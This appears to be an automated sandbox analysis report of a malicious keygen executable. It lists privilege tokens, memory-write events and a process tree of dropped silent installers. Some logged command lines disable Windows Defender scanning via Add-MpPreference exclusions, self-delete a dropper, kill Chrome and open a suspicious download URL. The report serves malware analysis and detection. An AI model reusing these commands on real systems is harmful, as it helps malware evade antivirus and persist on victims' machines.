description pid Process Token: SeDebugPrivilege 4456 Setup.exe Token: SeCreateTokenPrivilege 2692 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2692 askinstall20.exe Token: SeLockMemoryPrivilege 2692 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2692 askinstall20.exe Token: SeMachineAccountPrivilege 2692 askinstall20.exe Token: SeTcbPrivilege 2692 askinstall20.exe Token: SeSecurityPrivilege 2692 askinstall20.exe Token: SeTakeOwnershipPrivilege 2692 askinstall20.exe Token: SeLoadDriverPrivilege 2692 askinstall20.exe Token: SeSystemProfilePrivilege 2692 askinstall20.exe Token: SeSystemtimePrivilege 2692 askinstall20.exe Token: SeProfSingleProcessPrivilege 2692 askinstall20.exe Token: SeIncBasePriorityPrivilege 2692 askinstall20.exe Token: SeCreatePagefilePrivilege 2692 askinstall20.exe Token: SeCreatePermanentPrivilege 2692 askinstall20.exe Token: SeBackupPrivilege 2692 askinstall20.exe Token: SeRestorePrivilege 2692 askinstall20.exe Token: SeShutdownPrivilege 2692 askinstall20.exe Token: SeDebugPrivilege 2692 askinstall20.exe Token: SeAuditPrivilege 2692 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2692 askinstall20.exe Token: SeChangeNotifyPrivilege 2692 askinstall20.exe Token: SeRemoteShutdownPrivilege 2692 askinstall20.exe Token: SeUndockPrivilege 2692 askinstall20.exe Token: SeSyncAgentPrivilege 2692 askinstall20.exe Token: SeEnableDelegationPrivilege 2692 askinstall20.exe Token: SeManageVolumePrivilege 2692 askinstall20.exe Token: SeImpersonatePrivilege 2692 askinstall20.exe Token: SeCreateGlobalPrivilege 2692 askinstall20.exe Token: 31 2692 askinstall20.exe Token: 32 2692 askinstall20.exe Token: 33 2692 askinstall20.exe Token: 34 2692 askinstall20.exe Token: 35 2692 askinstall20.exe Token: SeDebugPrivilege 3208 multitimer.exe Token: SeDebugPrivilege 3008 taskkill.exe Token: SeDebugPrivilege 4732 MicrosoftEdge.exe Token: SeDebugPrivilege 4732 MicrosoftEdge.exe Token: SeDebugPrivilege 4732 MicrosoftEdge.exe Token: SeDebugPrivilege 4732 MicrosoftEdge.exe Token: SeDebugPrivilege 2124 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2124 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2124 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2124 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2376 multitimer.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3932 setups.exe 4644 setups.tmp 4732 MicrosoftEdge.exe 1540 MicrosoftEdgeCP.exe 1540 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 4704 wrote to memory of 4268 4704 S.A.D.Formatwandler.360.keygen.by.Lz0.exe 78 PID 4704 wrote to memory of 4268 4704 S.A.D.Formatwandler.360.keygen.by.Lz0.exe 78 PID 4704 wrote to memory of 4268 4704 S.A.D.Formatwandler.360.keygen.by.Lz0.exe 78 PID 4268 wrote to memory of 640 4268 cmd.exe 81 PID 4268 wrote to memory of 640 4268 cmd.exe 81 PID 4268 wrote to memory of 640 4268 cmd.exe 81 PID 4268 wrote to memory of 804 4268 cmd.exe 82 PID 4268 wrote to memory of 804 4268 cmd.exe 82 PID 4268 wrote to memory of 804 4268 cmd.exe 82 PID 4268 wrote to memory of 400 4268 cmd.exe 83 PID 4268 wrote to memory of 400 4268 cmd.exe 83 PID 4268 wrote to memory of 400 4268 cmd.exe 83 PID 4268 wrote to memory of 1128 4268 cmd.exe 84 PID 4268 wrote to memory of 1128 4268 cmd.exe 84 PID 4268 wrote to memory of 1128 4268 cmd.exe 84 PID 640 wrote to memory of 4460 640 keygen-pr.exe 85 PID 640 wrote to memory of 4460 640 keygen-pr.exe 85 PID 640 wrote to memory of 4460 640 keygen-pr.exe 85 PID 1128 wrote to memory of 4456 1128 keygen-step-4.exe 86 PID 1128 wrote to memory of 4456 1128 keygen-step-4.exe 86 PID 4460 wrote to memory of 2372 4460 key.exe 87 PID 4460 wrote to memory of 2372 4460 key.exe 87 PID 4460 wrote to memory of 2372 4460 key.exe 87 PID 400 wrote to memory of 2424 400 keygen-step-3.exe 88 PID 400 wrote to memory of 2424 400 keygen-step-3.exe 88 PID 400 wrote to memory of 2424 400 keygen-step-3.exe 88 PID 2424 wrote to memory of 2756 2424 cmd.exe 90 PID 2424 wrote to memory of 2756 2424 cmd.exe 90 PID 2424 wrote to memory of 2756 2424 cmd.exe 90 PID 4456 wrote to memory of 3208 4456 Setup.exe 91 PID 4456 wrote to memory of 3208 4456 Setup.exe 91 PID 4456 wrote to memory of 3932 4456 Setup.exe 92 PID 4456 wrote to memory of 3932 4456 Setup.exe 92 PID 4456 wrote to memory of 3932 4456 Setup.exe 92 PID 1128 wrote to memory of 2692 1128 keygen-step-4.exe 93 PID 1128 wrote to memory of 2692 1128 keygen-step-4.exe 93 PID 1128 wrote to memory of 2692 1128 keygen-step-4.exe 93 PID 3932 wrote to memory of 4644 3932 setups.exe 94 PID 3932 wrote to memory of 4644 3932 setups.exe 94 PID 3932 wrote to memory of 4644 3932 setups.exe 94 PID 2692 wrote to memory of 2088 2692 askinstall20.exe 96 PID 2692 wrote to memory of 2088 2692 askinstall20.exe 96 PID 2692 wrote to memory of 2088 2692 askinstall20.exe 96 PID 2088 wrote to memory of 3008 2088 cmd.exe 99 PID 2088 wrote to memory of 3008 2088 cmd.exe 99 PID 2088 wrote to memory of 3008 2088 cmd.exe 99 PID 3208 wrote to memory of 4400 3208 multitimer.exe 104 PID 3208 wrote to memory of 4400 3208 multitimer.exe 104 PID 4400 wrote to memory of 2376 4400 multitimer.exe 105 PID 4400 wrote to memory of 2376 4400 multitimer.exe 105 PID 1128 wrote to memory of 2928 1128 keygen-step-4.exe 106 PID 1128 wrote to memory of 2928 1128 keygen-step-4.exe 106 PID 1128 wrote to memory of 2928 1128 keygen-step-4.exe 106 PID 1540 wrote to memory of 2124 1540 MicrosoftEdgeCP.exe 103 PID 1540 wrote to memory of 2124 1540 MicrosoftEdgeCP.exe 103 PID 1540 wrote to memory of 2124 1540 MicrosoftEdgeCP.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe"C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:804
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Users\Admin\AppData\Local\Temp\BP9P23CXDZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BP9P23CXDZ\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Users\Admin\AppData\Local\Temp\BP9P23CXDZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BP9P23CXDZ\multitimer.exe" 1 3.1616748977.605da1b1a6cea 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\BP9P23CXDZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BP9P23CXDZ\multitimer.exe" 2 3.1616748977.605da1b1a6cea7⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376 -
C:\Users\Admin\AppData\Local\Temp\xppeiuqkmkr\rhr4vcty2nf.exe"C:\Users\Admin\AppData\Local\Temp\xppeiuqkmkr\rhr4vcty2nf.exe" /VERYSILENT8⤵PID:2752
-
C:\Users\Admin\AppData\Local\Temp\is-53BE0.tmp\rhr4vcty2nf.tmp"C:\Users\Admin\AppData\Local\Temp\is-53BE0.tmp\rhr4vcty2nf.tmp" /SL5="$70118,2592217,780800,C:\Users\Admin\AppData\Local\Temp\xppeiuqkmkr\rhr4vcty2nf.exe" /VERYSILENT9⤵PID:2148
-
-
-
C:\Users\Admin\AppData\Local\Temp\bo35wjvbgxx\vict.exe"C:\Users\Admin\AppData\Local\Temp\bo35wjvbgxx\vict.exe" /VERYSILENT /id=5358⤵PID:4048
-
C:\Users\Admin\AppData\Local\Temp\is-SRJO2.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-SRJO2.tmp\vict.tmp" /SL5="$30152,870426,780800,C:\Users\Admin\AppData\Local\Temp\bo35wjvbgxx\vict.exe" /VERYSILENT /id=5359⤵PID:4444
-
C:\Users\Admin\AppData\Local\Temp\is-G0C2I.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-G0C2I.tmp\winhost.exe" 53510⤵PID:5536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ugqteud3jgo\mzqgoj0sgnf.exe"C:\Users\Admin\AppData\Local\Temp\ugqteud3jgo\mzqgoj0sgnf.exe" /ustwo INSTALL8⤵PID:1372
-
-
C:\Users\Admin\AppData\Local\Temp\loxp2ifxmph\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\loxp2ifxmph\Setup3310.exe" /Verysilent /subid=5778⤵PID:4544
-
C:\Users\Admin\AppData\Local\Temp\is-0VEH1.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-0VEH1.tmp\Setup3310.tmp" /SL5="$10316,138429,56832,C:\Users\Admin\AppData\Local\Temp\loxp2ifxmph\Setup3310.exe" /Verysilent /subid=5779⤵PID:2500
-
-
-
C:\Users\Admin\AppData\Local\Temp\3wes2nomper\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\3wes2nomper\AwesomePoolU1.exe"8⤵PID:976
-
-
C:\Users\Admin\AppData\Local\Temp\cqh3xi3wq4k\vpn.exe"C:\Users\Admin\AppData\Local\Temp\cqh3xi3wq4k\vpn.exe" /silent /subid=4828⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\is-FS98R.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-FS98R.tmp\vpn.tmp" /SL5="$1034A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\cqh3xi3wq4k\vpn.exe" /silent /subid=4829⤵PID:4652
-
-
-
C:\Users\Admin\AppData\Local\Temp\fxpxhj0oizz\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\fxpxhj0oizz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5080
-
C:\Users\Admin\AppData\Local\Temp\is-H9P7S.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-H9P7S.tmp\IBInstaller_97039.tmp" /SL5="$103F2,9918015,721408,C:\Users\Admin\AppData\Local\Temp\fxpxhj0oizz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5156
-
-
-
C:\Users\Admin\AppData\Local\Temp\lbn2clnuhp3\wvjdbtpwxds.exe"C:\Users\Admin\AppData\Local\Temp\lbn2clnuhp3\wvjdbtpwxds.exe" /quiet SILENT=1 AF=7568⤵PID:1040
-
-
C:\Users\Admin\AppData\Local\Temp\11ygym0xp3z\app.exe"C:\Users\Admin\AppData\Local\Temp\11ygym0xp3z\app.exe" /8-238⤵PID:5556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Falling-Sunset'9⤵PID:5596
-
-
-
C:\Users\Admin\AppData\Local\Temp\hcbrdcsn05i\nkx5gx5b3bw.exe"C:\Users\Admin\AppData\Local\Temp\hcbrdcsn05i\nkx5gx5b3bw.exe" /1-6108⤵PID:5660
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\White-Dust'9⤵PID:5716
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\L4JG2Y9FY7\setups.exe"C:\Users\Admin\AppData\Local\Temp\L4JG2Y9FY7\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\is-NB6K8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-NB6K8.tmp\setups.tmp" /SL5="$700F8,383902,148480,C:\Users\Admin\AppData\Local\Temp\L4JG2Y9FY7\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:5180
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4732
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3896
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1540
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970391⤵PID:5392
-
C:\Users\Admin\AppData\Local\Temp\is-A53KC.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-A53KC.tmp\{app}\chrome_proxy.exe"1⤵PID:5428
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5828